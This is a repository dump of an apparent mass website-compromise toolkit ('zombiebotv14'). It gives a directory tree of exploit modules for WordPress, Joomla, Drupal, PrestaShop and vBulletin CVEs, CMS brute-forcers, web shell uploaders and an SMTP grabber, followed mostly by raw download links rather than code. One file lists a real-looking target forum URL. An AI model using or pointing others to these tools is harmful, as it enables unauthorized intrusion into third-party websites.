├── Files ├── Tool1 │ ├── Exploits │ │ ├── __init__.py │ │ ├── env.pyc │ │ ├── Com_JCE.pyc │ │ ├── Headway.pyc │ │ ├── adminer.pyc │ │ ├── phpunit.pyc │ │ ├── Wprealia.pyc │ │ ├── __init__.pyc │ │ ├── com_media.pyc │ │ ├── formcraft.pyc │ │ ├── megamenu.pyc │ │ ├── wpinstall.pyc │ │ ├── Com_Fabric.pyc │ │ ├── Com_JCEindex.pyc │ │ ├── Com_Myblog.pyc │ │ ├── Com_alberghi.pyc │ │ ├── Com_civicrm.pyc │ │ ├── Presta_lib.pyc │ │ ├── Wp_mmplugin.pyc │ │ ├── Wp_pagelines.pyc │ │ ├── Wp_prh_api.pyc │ │ ├── osCommerce.pyc │ │ ├── phpcurlclass.pyc │ │ ├── printModule.pyc │ │ ├── Com_CCkJseblod.pyc │ │ ├── Com_FoxContent.pyc │ │ ├── Com_Jbcatalog.pyc │ │ ├── Com_Joomanager.pyc │ │ ├── Com_Macgallery.pyc │ │ ├── Com_adsmanager.pyc │ │ ├── Com_b2jcontact.pyc │ │ ├── Com_extplorer.pyc │ │ ├── Com_redmystic.pyc │ │ ├── Wp_Job_Manager.pyc │ │ ├── Wp_cloudflare.pyc │ │ ├── cherry_plugin.pyc │ │ ├── com_jdownloads.pyc │ │ ├── wp_barclaycart.pyc │ │ ├── wp_eshop_magic.pyc │ │ ├── Com_Hdflvplayer.pyc │ │ ├── Com_bt_portfolio.pyc │ │ ├── Com_facileforms.pyc │ │ ├── Com_jwallpapers.pyc │ │ ├── Com_oziogallery.pyc │ │ ├── Com_rokdownloads.pyc │ │ ├── Drupal_mailchimp.pyc │ │ ├── Presta_megamenu.pyc │ │ ├── Presta_videostab.pyc │ │ ├── WPJekyll_Exporter.pyc │ │ ├── WP_User_Frontend.pyc │ │ ├── Wp_HD_WebPlayer.pyc │ │ ├── Wp_contabileads.pyc │ │ ├── Wp_enfold_child.pyc │ │ ├── pagelinesExploit.pyc │ │ ├── wpConfigDownload.pyc │ │ ├── CVE_2014_4725wysija.pyc │ │ ├── Com_SexyContactform.pyc │ │ ├── Com_s5_media_player.pyc │ │ ├── Presta_pk_flexmenu.pyc │ │ ├── Presta_soopabanners.pyc │ │ ├── Presta_soopamobile.pyc │ │ ├── Wp_addblockblocker.pyc │ │ ├── Wp_dzs_videogallery.pyc │ │ ├── viral_optinsExploit.pyc │ │ ├── wp_miniaudioplayer.pyc │ │ ├── CVE_2006_2529fckeditor.pyc │ │ ├── CVE_2015_8562RCEjoomla.pyc │ │ ├── CVE_2017_16562userpro.pyc │ │ ├── CVE_2017_9841PHPUnit.pyc │ │ ├── Com_simplephotogallery.pyc │ │ ├── Presta_advancedslider.pyc │ │ ├── Presta_columnadverts.pyc │ │ ├── Presta_fieldvmegamenu.pyc │ │ ├── Presta_simpleslideshow.pyc │ │ ├── Presta_vtermslideshow.pyc │ │ ├── Presta_wdoptionpanel.pyc │ │ ├── WpCateGory_page_icons.pyc │ │ ├── Wpwoocommercesoftware.pyc │ │ ├── cartabandonmentproOld.pyc │ │ ├── mod_simplefileuploadv1.pyc │ │ ├── wp_content_injection.pyc │ │ ├── CVE_2019_9879wp_graphql.pyc │ │ ├── Presta_homepageadvertise.pyc │ │ ├── Presta_nvn_export_orders.pyc │ │ ├── CVE_2015_4455_gravityforms.pyc │ │ ├── CVE_2015_5151_revsliderCSS.pyc │ │ ├── CVE_2015_8562RCEjoomla2019.pyc │ │ ├── CVE_2018_7600Drupalgeddon2.pyc │ │ ├── CVE_2019_16759vBulletinRCE.pyc │ │ ├── CVE_2019_6340Drupal8RESTful.pyc │ │ ├── CVE_2019_9978SocialWarfare.pyc │ │ ├── Presta_1attributewizardpro.pyc │ │ ├── Presta_attributewizardpro.pyc │ │ ├── Presta_attributewizardpro3.pyc │ │ ├── Presta_attributewizardpro_x.pyc │ │ ├── Presta_cartabandonmentpro.pyc │ │ ├── Presta_homepageadvertise2.pyc │ │ ├── Presta_productpageadverts.pyc │ │ ├── Presta_tdpsthemeoptionpanel.pyc │ │ ├── CVE_2008_3362Download_Manager.pyc │ │ ├── CVE_2014_3704Drupal_add_Admin.pyc │ │ ├── CVE_2014_9735_revsliderShell.pyc │ │ ├── CVE_2016_9838TakeAdminJoomla.pyc │ │ ├── Presta_jro_homepageadvertise.pyc │ │ ├── Presta_psmodthemeoptionpanel.pyc │ │ ├── WooCommerce_ProductAddonsExp.pyc │ │ ├── CVE_2015_4455_gravityformsindex.pyc │ │ ├── CVE_2018_19207wp_gdpr_compliance.pyc │ │ ├── Presta_wg24themeadministration.pyc │ │ ├── CVE_2020_8772_wpInfinitewp_authBypass.pyc │ │ ├── phpunit.py │ │ ├── megamenu.py │ │ ├── Com_jwallpapers.py │ │ ├── Wp_prh_api.py │ │ ├── Drupal_mailchimp.py │ │ ├── Wp_cloudflare.py │ │ ├── Wp_mmplugin.py │ │ ├── phpcurlclass.py │ │ ├── Wprealia.py │ │ ├── WPJekyll_Exporter.py │ │ ├── Wp_enfold_child.py │ │ ├── Wp_dzs_videogallery.py │ │ ├── Wp_contabileads.py │ │ ├── Wpwoocommercesoftware.py │ │ ├── CVE_2017_16562userpro.py │ │ ├── Com_bt_portfolio.py │ │ ├── mod_simplefileuploadv1.py │ │ ├── wp_miniaudioplayer.py │ │ ├── Wp_HD_WebPlayer.py │ │ ├── CVE_2019_9978SocialWarfare.py │ │ ├── Presta_megamenu.py │ │ ├── Com_b2jcontact.py │ │ ├── Com_oziogallery.py │ │ ├── CVE_2015_5151_revsliderCSS.py │ │ ├── Presta_videostab.py │ │ ├── Presta_cartabandonmentpro.py │ │ ├── Com_Fabric.py │ │ ├── cartabandonmentproOld.py │ │ ├── Com_simplephotogallery.py │ │ ├── Presta_advancedslider.py │ │ ├── Com_redmystic.py │ │ ├── CVE_2019_9879wp_graphql.py │ │ ├── CVE_2018_19207wp_gdpr_compliance.py │ │ ├── wp_eshop_magic.py │ │ ├── Wp_Job_Manager.py │ │ ├── Com_Myblog.py │ │ ├── WpCateGory_page_icons.py │ │ ├── Wp_pagelines.py │ │ ├── Com_alberghi.py │ │ ├── printModule.py │ │ ├── Com_CCkJseblod.py │ │ ├── Com_Macgallery.py │ │ ├── Com_Hdflvplayer.py │ │ ├── Com_Joomanager.py │ │ ├── Com_civicrm.py │ │ ├── CVE_2014_3704Drupal_add_Admin.py │ │ ├── Com_s5_media_player.py │ │ ├── Wp_addblockblocker.py │ │ ├── com_media.py │ │ ├── pagelinesExploit.py │ │ ├── Presta_columnadverts.py │ │ ├── Com_JCEindex.py │ │ ├── wp_barclaycart.py │ │ ├── Presta_soopamobile.py │ │ ├── cherry_plugin.py │ │ ├── Presta_soopabanners.py │ │ ├── viral_optinsExploit.py │ │ ├── CVE_2015_4455_gravityformsindex.py │ │ ├── Presta_vtermslideshow.py │ │ ├── Presta_simpleslideshow.py │ │ ├── Presta_homepageadvertise.py │ │ ├── CVE_2019_16759vBulletinRCE.py │ │ ├── Presta_homepageadvertise2.py │ │ ├── Presta_productpageadverts.py │ │ ├── Presta_lib.py │ │ ├── Presta_jro_homepageadvertise.py │ │ ├── WooCommerce_ProductAddonsExp.py │ │ ├── Presta_pk_flexmenu.py │ │ ├── Presta_fieldvmegamenu.py │ │ ├── Presta_nvn_export_orders.py │ │ ├── WP_User_Frontend.py │ │ ├── Presta_tdpsthemeoptionpanel.py │ │ ├── Presta_psmodthemeoptionpanel.py │ │ ├── Presta_wdoptionpanel.py │ │ ├── CVE_2014_4725wysija.py │ │ └── Presta_attributewizardpro3.py │ ├── BruteForce │ │ ├── __init__.py │ │ ├── Drupal.pyc │ │ ├── Joomla.pyc │ │ ├── Opencart.pyc │ │ ├── Wordpress.pyc │ │ ├── __init__.pyc │ │ └── FTPBruteForce.pyc │ ├── files │ │ ├── YOUREMAIL.txt │ │ ├── vuln.txt │ │ ├── files.zip │ │ ├── pwn.gif │ │ ├── vuln.gif │ │ ├── jdownlods.zip │ │ ├── rsz.ocmod2.zip │ │ ├── rock.jpg │ │ ├── vuln.htm │ │ ├── up.php │ │ ├── shcode.txt │ │ ├── shell.jpg │ │ ├── DefaultPasswords_Drupal.txt │ │ ├── DefaultPasswords_Joomla.txt │ │ ├── DefaultPasswords_Wordpress.txt │ │ ├── DefaultPasswords_opencart.txt │ │ ├── banner.txt │ │ ├── vuln.php3.j │ │ ├── OsComPayLoad.php │ │ ├── index.jpg │ │ ├── grav.jpg │ │ └── settings_auto.php │ ├── cms │ │ ├── vBulletin.txt │ │ ├── Wordpress.txt │ │ └── unknown.txt │ ├── v14.pyc │ └── Tools │ │ ├── Sqli.pyc │ │ ├── cms.pyc │ │ ├── cpanel.pyc │ │ ├── getSMTP.pyc │ │ ├── __init__.pyc │ │ ├── shellupload.pyc │ │ ├── wsoShellUploaderModule.pyc │ │ ├── __init__.py │ │ ├── getSMTP.py │ │ └── wsoShellUploaderModule.py ├── Tool7 │ ├── Vulns │ │ └── vuln_cpanel.txt │ ├── Run Command.txt │ └── password.txt ├── Tool11 │ ├── Result │ │ ├── Shell_Resultas.txt │ │ └── index.txt │ └── files │ │ ├── Master.zip │ │ ├── raiz0.php5 │ │ ├── XxX.php │ │ ├── up.php │ │ ├── vuln.php │ │ ├── root.php │ │ ├── shell.gif │ │ ├── 098.php │ │ └── raiz0.php ├── Tool16 │ └── private.py ├── Tool10 │ └── masscp.py ├── Tool13 │ └── mscs.py ├── Tool14 │ └── msua.py ├── Tool8 │ └── masscp.py ├── Tool9 │ └── cpreset.py ├── Tool12 │ └── shellchecker.py ├── Tool20 │ └── Update.txt ├── Tool19 │ └── dup.py └── Tool2 │ └── dorker.py └── README.md /Files/Tool1/Exploits/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Files/Tool7/Vulns/vuln_cpanel.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Files/Tool1/BruteForce/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Files/Tool11/Result/Shell_Resultas.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Files/Tool16/private.py: -------------------------------------------------------------------------------- 1 | print("Error File") -------------------------------------------------------------------------------- /Files/Tool1/files/YOUREMAIL.txt: -------------------------------------------------------------------------------- 1 | demo@email.com 2 | -------------------------------------------------------------------------------- /Files/Tool1/files/vuln.txt: -------------------------------------------------------------------------------- 1 | Vuln!! patch it Now! 2 | -------------------------------------------------------------------------------- /Files/Tool7/Run Command.txt: -------------------------------------------------------------------------------- 1 | python bruter.py 50 domain.txt password.txt -------------------------------------------------------------------------------- /Files/Tool1/cms/vBulletin.txt: -------------------------------------------------------------------------------- 1 | forum.dneprcity.net/showpost.php?p=501108&postcount=8 2 | -------------------------------------------------------------------------------- /Files/Tool1/v14.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/v14.pyc -------------------------------------------------------------------------------- /Files/Tool10/masscp.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool10/masscp.py -------------------------------------------------------------------------------- /Files/Tool13/mscs.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool13/mscs.py -------------------------------------------------------------------------------- /Files/Tool14/msua.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool14/msua.py -------------------------------------------------------------------------------- /Files/Tool8/masscp.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool8/masscp.py -------------------------------------------------------------------------------- /Files/Tool9/cpreset.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool9/cpreset.py -------------------------------------------------------------------------------- /Files/Tool1/Tools/Sqli.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Tools/Sqli.pyc -------------------------------------------------------------------------------- /Files/Tool1/Tools/cms.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Tools/cms.pyc -------------------------------------------------------------------------------- /Files/Tool1/files/files.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/files/files.zip -------------------------------------------------------------------------------- /Files/Tool1/files/pwn.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/files/pwn.gif -------------------------------------------------------------------------------- /Files/Tool1/files/vuln.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/files/vuln.gif -------------------------------------------------------------------------------- /Files/Tool1/Exploits/env.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/env.pyc -------------------------------------------------------------------------------- /Files/Tool1/Tools/cpanel.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Tools/cpanel.pyc -------------------------------------------------------------------------------- /Files/Tool1/Tools/getSMTP.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Tools/getSMTP.pyc -------------------------------------------------------------------------------- /Files/Tool11/files/Master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool11/files/Master.zip -------------------------------------------------------------------------------- /Files/Tool12/shellchecker.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool12/shellchecker.py -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_JCE.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_JCE.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Headway.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Headway.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/adminer.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/adminer.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/phpunit.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/phpunit.pyc -------------------------------------------------------------------------------- /Files/Tool1/Tools/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Tools/__init__.pyc -------------------------------------------------------------------------------- /Files/Tool1/files/jdownlods.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/files/jdownlods.zip -------------------------------------------------------------------------------- /Files/Tool1/files/rsz.ocmod2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/files/rsz.ocmod2.zip -------------------------------------------------------------------------------- /Files/Tool1/BruteForce/Drupal.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/BruteForce/Drupal.pyc -------------------------------------------------------------------------------- /Files/Tool1/BruteForce/Joomla.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/BruteForce/Joomla.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wprealia.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Wprealia.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/__init__.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/com_media.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/com_media.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/formcraft.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/formcraft.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/megamenu.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/megamenu.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/wpinstall.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/wpinstall.pyc -------------------------------------------------------------------------------- /Files/Tool1/Tools/shellupload.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Tools/shellupload.pyc -------------------------------------------------------------------------------- /Files/Tool1/BruteForce/Opencart.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/BruteForce/Opencart.pyc -------------------------------------------------------------------------------- /Files/Tool1/BruteForce/Wordpress.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/BruteForce/Wordpress.pyc -------------------------------------------------------------------------------- /Files/Tool1/BruteForce/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/BruteForce/__init__.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_Fabric.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_Fabric.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_JCEindex.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_JCEindex.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_Myblog.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_Myblog.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_alberghi.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_alberghi.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_civicrm.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_civicrm.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_lib.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_lib.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wp_mmplugin.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Wp_mmplugin.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wp_pagelines.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Wp_pagelines.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wp_prh_api.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Wp_prh_api.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/osCommerce.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/osCommerce.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/phpcurlclass.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/phpcurlclass.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/printModule.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/printModule.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_CCkJseblod.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_CCkJseblod.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_FoxContent.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_FoxContent.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_Jbcatalog.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_Jbcatalog.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_Joomanager.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_Joomanager.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_Macgallery.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_Macgallery.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_adsmanager.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_adsmanager.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_b2jcontact.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_b2jcontact.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_extplorer.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_extplorer.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_redmystic.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_redmystic.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wp_Job_Manager.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Wp_Job_Manager.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wp_cloudflare.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Wp_cloudflare.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/cherry_plugin.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/cherry_plugin.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/com_jdownloads.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/com_jdownloads.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/wp_barclaycart.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/wp_barclaycart.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/wp_eshop_magic.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/wp_eshop_magic.pyc -------------------------------------------------------------------------------- /Files/Tool1/BruteForce/FTPBruteForce.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/BruteForce/FTPBruteForce.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_Hdflvplayer.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_Hdflvplayer.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_bt_portfolio.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_bt_portfolio.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_facileforms.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_facileforms.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_jwallpapers.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_jwallpapers.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_oziogallery.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_oziogallery.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_rokdownloads.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_rokdownloads.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Drupal_mailchimp.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Drupal_mailchimp.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_megamenu.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_megamenu.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_videostab.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_videostab.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/WPJekyll_Exporter.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/WPJekyll_Exporter.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/WP_User_Frontend.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/WP_User_Frontend.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wp_HD_WebPlayer.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Wp_HD_WebPlayer.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wp_contabileads.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Wp_contabileads.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wp_enfold_child.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Wp_enfold_child.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/pagelinesExploit.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/pagelinesExploit.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/wpConfigDownload.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/wpConfigDownload.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2014_4725wysija.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/CVE_2014_4725wysija.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_SexyContactform.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_SexyContactform.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_s5_media_player.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_s5_media_player.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_pk_flexmenu.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_pk_flexmenu.pyc -------------------------------------------------------------------------------- 